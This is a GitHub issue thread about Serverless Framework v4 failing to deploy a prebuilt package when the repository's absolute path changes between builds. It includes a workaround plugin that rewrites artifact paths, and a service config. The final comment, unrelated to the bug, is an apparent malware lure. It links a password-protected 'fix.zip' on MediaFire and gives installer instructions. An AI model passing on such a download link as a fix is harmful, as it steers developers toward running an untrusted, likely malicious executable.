### ISSUE TITLE
V4 cannot deploy using --package option if working directory absolute path doesn't exactly match directory where package --package command is run

### ISSUE THREAD

**Issue by smilin-desperado** [serverless/serverless#12775]
### Issue description

We have a process where we create deployment artefacts using:
```
serverless package --package deployment-artefact
```
and store them for future deployments.

During deployment we run
```
serverless deploy --package deployment-artefact
```
to deploy the service using the previously packaged artefact. 

These commands are always run at the root of the repository but the location of the repository (relative to /) may change between builds e.g. `/build/abc123/repo` and `/build/cde456/repo`.

In version 3, this works as we expect but version 4 reports a "No {package}.zip file found in the package path you provided" and does not deploy.

It looks like the `serverless-state.json` file included in the built package contains an absolute path to the package artefact and when deploying this path is searched for the build artefact which causes the issue we see.

As a workaround, we have written a plugin to replace the absolute path in `functions.function.package.artifact` to one relative to where the deploy is run and this seems to fix this issue.

```
import path from 'path';

export default class ArtifactRelativePathInState {
  constructor(serverless, options, { log }) {
    this.serverless = serverless;
    this.options = options;
    this.log = log;
    this.provider = this.serverless.getProvider('aws');

    this.hooks = {
      'after:package:finalize': () => this.updateArtifactPath(),
    };
  }

  getServiceState() {
    const stateFilePath = this.getServiceStatePath();

    return this.serverless.utils.readFileSync(stateFilePath);
  }

  getServiceStatePath() {
    const stateFileName = this.provider.naming.getServiceStateFileName();
    const serviceDir = this.serverless.serviceDir;
    const packageDirName = this.options.package || '.serverless';

    return path.resolve(serviceDir, packageDirName, stateFileName);
  }

  toRelativePath(filePath) {
    const serviceDir = this.serverless.serviceDir;
    const { package: pkgDest } = this.options;
    const buildDir = path.resolve(serviceDir, '.serverless');
    return path.join(pkgDest, filePath.replace(buildDir, ''));
  }

  updatePackageArtifacts(serviceState) {
    for (const fn in serviceState?.service?.functions) {
      const artifactPath =
        serviceState.service.functions[fn]?.package?.artifact;

      if (!artifactPath) {
        this.log.debug(`No artifact path found for ${fn}`);
        return;
      }

      this.log.debug(`Found artifact path: ${artifactPath}`);

      const updatedPath = this.toRelativePath(artifactPath);
      this.log.debug(`Updated artifact path for ${fn}: ${updatedPath}`);
      serviceState.service.functions[fn].package.artifact = updatedPath;
    }

    return serviceState;
  }

  updateArtifactPath() {
    const serviceState = this.getServiceState();
    const updatedState = this.updatePackageArtifacts(serviceState);

    const serviceStatePath = this.getServiceStatePath();
    this.log.debug(`Using service state path: ${serviceStatePath}`);
    this.serverless.utils.writeFileSync(serviceStatePath, updatedState, true);

    this.log.success('Updated state to use relative artifact paths.');
  }
}

```

### Context

# Service Overview
- Serverless Framework Version: 4.2.4
- Service Config File: serverless.yml
- Service Name: sls-package-deploy-a
- Service Runtime: nodejs20.x
- Service Stage: dev
- Service Region: ap-southeast-2
- Command: remove 

## Service Path
/Users/pascal/code/tmp/sls-package-deploy-a

## Service Config
```
service: sls-package-deploy-a
frameworkVersion: '4'
provider:
  name: aws
  runtime: nodejs20.x
  region: ap-southeast-2
package:
  individually: true
functions:
  test:
    handler: src/test.handler
```

# Service Overview
- Serverless Framework Version: 4.2.4
- Command: support --summary true

**Comment by smilin-desperado** [comment]
Similar to https://github.com/serverless/serverless/issues/12246 but v4 appears to behave differently when deploying

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
